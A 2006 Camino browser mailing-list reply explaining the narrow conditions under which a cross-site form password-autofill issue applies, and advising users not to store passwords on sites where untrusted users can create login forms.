[Camino] Security issue: Cross-site forms and password autofill
Stuart Morgan
stuart.morgan at alumni.case.edu
Thu Nov 23 16:54:53 PST 2006
On Nov 23, 2006, at 8:51 AM, Martin Girschick wrote:
> I guess a way to temporarily disable password auto-fill until the
> issue is resolved is to uncheck "Save web form passwords..." in the
> "Privacy"-section.
Or just remove/don't store passwords for sites with largely
unrestricted, user-provided content. The attack only applies to
sites where:
a) you have to log in to the site, and
b) people other than site admins have the ability to create HTML
forms with password elements on the site, and
c) the realm of the login page is the same as the realm of the user-
created pages (i.e., there is not a login.foo.com page for logging in).
The fraction of sites on the web meeting those criteria is very, very
small. Simply not using password storage on those particular sites
is just as secure as turning the feature off completely, with much
less reduction in functionality.
-Stuart
More information about the Camino
mailing list